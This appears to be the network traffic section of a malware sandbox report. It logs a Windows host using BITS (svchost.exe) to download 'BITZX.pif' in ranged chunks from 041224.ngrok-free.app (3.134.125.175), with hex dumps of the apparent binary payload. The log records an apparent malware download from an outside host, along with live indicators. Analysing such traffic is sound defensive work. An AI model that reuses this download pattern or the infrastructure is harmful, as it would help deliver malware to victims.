        2024-12-16 16:46:01 UTC301INData Raw: 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 c4 00 00 02 00 00 00 43 13 00 00 a7 00 00 00 ea 13 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 5d 11 00 00 c0 00 00 00 1d 12 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 c2 15 00 00 06 01 00 00 c8 16 00 00 a7 00 00 00 00 00 00 00 02 00 00 00 90 10 00 00 fd 07 00 00 8d 18 00 00 90 00 00 00 00 00 00 00 02 00 00 00 0a 0f 00 00 84 0c 00 00 8e 1b 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 d2 09 00 00 44 19 00 00 16 23 00 00 98 00 00 00 00 00 00 00 02 00 00 00 05 07 00 00 a9 1c 00 00 ae 23 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 14 24 00 00 48 24 00 00 7e 00 00 00 2d 00 00 01 13
        Data Ascii: *.(C(9***0*AC}]D##4$H$~-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        129192.168.11.20498433.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:03 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=31159-31215
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:03 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 57
        Content-Range: bytes 31159-31215/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:02 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:03 UTC57INData Raw: 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 c4 00 00 02 00 00 00 b9 0f 00 00 ab 00 00 00 64 10 00 00 92 00 00 00 00 00 00 00 02 00 00 00 b9 13 00 00 a7 00 00 00 60 14 00 00
        Data Ascii: *Ad`


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        130192.168.11.20498443.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:05 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=31216-31287
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:05 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 72
        Content-Range: bytes 31216-31287/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:04 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:05 UTC72INData Raw: 90 00 00 00 00 00 00 00 02 00 00 00 6d 11 00 00 06 01 00 00 73 12 00 00 92 00 00 00 00 00 00 00 02 00 00 00 4c 0d 00 00 06 08 00 00 52 15 00 00 94 00 00 00 00 00 00 00 02 00 00 00 39 0b 00 00 d7 0c 00 00 10 18 00 00
        Data Ascii: msLR9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        131192.168.11.20498453.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:08 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=31288-31631
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:08 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 344
        Content-Range: bytes 31288-31631/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:08 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:08 UTC344INData Raw: e2 00 00 00 00 00 00 00 02 00 00 00 8f 06 00 00 8d 19 00 00 1c 20 00 00 c2 00 00 00 00 00 00 00 02 00 00 00 78 03 00 00 66 1d 00 00 de 20 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 f0 20 00 00 78 21 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 ac 00 00 02 00 00 00 1c 18 00 00 bc 00 00 00 d8 18 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 19 16 00 00 ab 00 00 00 c4 16 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 f8 11 00 00 1b 01 00 00 13 13 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 13 11 00 00 b6 08 00 00 c9 19 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 5e 0a 00 00 8e 16 00 00 ec 20 00
        Data Ascii: xf x!-0*.(C(9***0*A^


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        132192.168.11.20498463.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:11 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=31632-31965
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:11 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 334
        Content-Range: bytes 31632-31965/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:11 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:11 UTC334INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 ac 00 00 02 00 00 00 e0 13 00 00 a7 00 00 00 87 14 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 0f 15 00 00 a7 00 00 00 b6 15 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 17 12 00 00 0a 01 00 00 21 13 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 ed 0e 00 00 31 08 00 00 1e 17 00 00 a3 00 00 00 00 00 00 00 02 00 00 00 08 0a 00 00 51 16 00 00 59 20 00 00 ab 00 00 00 00 00 00 00 02 00 00 00 13 07 00 00 f1 19 00 00 04 21 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 3e 21 00 00 c6 21 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00
        Data Ascii: **0*A}!1QY !>!!~-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        133192.168.11.20498473.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:14 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=31966-32191
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:14 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 226
        Content-Range: bytes 31966-32191/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:14 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:14 UTC226INData Raw: 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 94 00 00 02 00 00 00 0b 10 00 00 bd 04 00 00 c8 14 00 00 ab 00 00 00 00 00 00 00 02 00 00 00 f2 0d 00 00 87 08 00 00
        Data Ascii: **0**.(C(9***0**.(C(9***0**.(C(9***0*A


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        134192.168.11.20498483.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:18 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=32192-32418
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:18 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 227
        Content-Range: bytes 32192-32418/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:17 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:18 UTC227INData Raw: 79 16 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 21 20 00 00 46 04 00 00 67 24 00 00 a7 00 00 00 00 00 00 00 02 00 00 00 5a 09 00 00 87 1d 00 00 e1 26 00 00 9a 00 00 00 00 00 00 00 02 00 00 00 95 06 00 00 e6 20 00 00 7b 27 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 87 00 00 00 8e 27 00 00 15 28 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 ac 00 00 02 00 00 00 8b 16 00 00 b3 04 00 00 3e 1b 00 00 90 00 00 00 00 00 00 00 02 00 00 00 97 15 00 00 96 08 00 00 2d 1e 00 00 90 00 00 00 00 00 00 00 02 00 00 00 cd 20 00
        Data Ascii: y! Fg$Z& {''(~-0*.(C(9***0*A>-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        135192.168.11.20498493.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:21 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=32419-32452
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:21 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 34
        Content-Range: bytes 32419-32452/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:21 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:21 UTC34INData Raw: 00 ef 04 00 00 bc 25 00 00 90 00 00 00 00 00 00 00 02 00 00 00 fa 11 00 00 76 14 00 00 70 26 00 00 a3
        Data Ascii: %vp&


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        136192.168.11.20498503.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:24 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=32453-32713
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:24 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 261
        Content-Range: bytes 32453-32713/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:24 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:24 UTC261INData Raw: 00 00 00 00 00 00 00 02 00 00 00 ae 08 00 00 40 20 00 00 ee 28 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 95 05 00 00 06 24 00 00 9b 29 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 73 00 00 00 d5 29 00 00 48 2a 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 88 0a 00 00 92 09 00 00 1a 14 00 00 98 00 00 00 00 00 00 00 02 00 00 00 97 07 00 00 1b 0d 00 00 b2 14 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 5b 00 00 00 04 15 00 00
        Data Ascii: @ ($)s)H*-0*.(C(9***0**.(C(9***0*AL[


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        137192.168.11.20498513.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:26 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=32714-32891
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:26 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 178
        Content-Range: bytes 32714-32891/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:25 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:26 UTC178INData Raw: 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 fa 0a 00 00 ea 07 00 00 e4 12 00 00 98 00 00 00 00 00 00 00 02 00 00 00 26 08 00 00 56 0b 00 00 7c 13 00 00 ab 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 9f 13 00 00 27 14 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00
        Data Ascii: -0*.(C(9***0*AL&V|'-0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        138192.168.11.20498523.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:29 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=32892-33478
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:29 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 587
        Content-Range: bytes 32892-33478/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:29 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:29 UTC587INData Raw: 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 7c 00 00 02 00 00 00 0e 0f 00 00 d6 00 00 00 e4 0f 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 fc 14 00 00 e0 00 00 00 dc 15 00 00 94 00 00 00 00 00 00 00 02 00 00 00 f6 10 00 00 5d 12 00 00 53 23 00 00 9c 00 00 00 00 00 00 00 02 00 00 00 c7 08 00 00 28 1b 00 00 ef 23 00 00 98 00 00 00 00 00 00 00 00 00 00 00 61 00 00 00 26 24 00 00 87 24 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 00 00 00 00 73 00 00 00 c0 0b 00 00 33 0c 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43
        Data Ascii: *0*A|]S#(#a&$$-0*.(C(9***0*As3~-0*.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        139192.168.11.20498533.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:32 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=33479-34087
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:32 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 609
        Content-Range: bytes 33479-34087/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:32 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:32 UTC609INData Raw: 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 7c 00 00 02 00 00 00 54 0a 00 00 f1 00 00 00 45 0b 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 15 08 00 00 23 09 00 00 38 11 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 97 05 00 00 40 14 00 00 d7 19 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 13 03 00 00 71 17 00 00 84 1a 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 fc 1a 00 00 31 1b 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 7c 00 00 02 00 00 00 28 0b 00 00 e7 00 00 00 0f 0c
        Data Ascii: *.(C(9***0*A|TE#8}@q51~-0*.(C(9***0*A|(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        140192.168.11.20498543.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:35 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34088-34273
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:35 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 186
        Content-Range: bytes 34088-34273/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:35 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:35 UTC186INData Raw: 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28
        Data Ascii: *0**.(C(9***0**.(C(9***0**.(C(9***0**.(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        141192.168.11.20498553.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:37 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34274-34324
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:37 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 51
        Content-Range: bytes 34274-34324/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:36 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:37 UTC51INData Raw: 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 a4
        Data Ascii: C(9***0*AL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        142192.168.11.20498563.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:39 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34325-34333
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:39 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 9
        Content-Range: bytes 34325-34333/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:39 UTC9INData Raw: 06 00 00 e0 09 00 00 84 10
        Data Ascii:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        143192.168.11.20498573.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:42 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34334-34425
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:43 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 92
        Content-Range: bytes 34334-34425/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:42 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:43 UTC92INData Raw: 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 73 03 00 00 be 0d 00 00 31 11 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 43 11 00 00 cb 11 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00
        Data Ascii: s1C-0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        144192.168.11.20498583.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:46 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34426-34846
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:47 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 421
        Content-Range: bytes 34426-34846/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:45 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:47 UTC421INData Raw: 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 b6 0e 00 00 b7 00 00 00 6d 0f 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 32 10 00 00 d8 09 00 00 0a 1a 00 00 85 00 00 00 00 00 00 00 02 00 00 00 f3 08 00 00 9c 11 00 00 8f 1a 00 00 85 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 b4 1a 00 00 14 1b 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 b3 0e 00 00 d0 07 00 00 83
        Data Ascii: *0**.(C(9***0*Adm2`~-0*.(C(9***0*AL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        145192.168.11.20498593.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:50 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34847-34993
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:51 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 147
        Content-Range: bytes 34847-34993/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:50 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:51 UTC147INData Raw: 00 00 00 00 00 02 00 00 00 cf 17 00 00 4d 17 00 00 1c 2f 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 ed 0c 00 00 dc 22 00 00 c9 2f 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 61 00 00 00 28 30 00 00 89 30 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 30 10
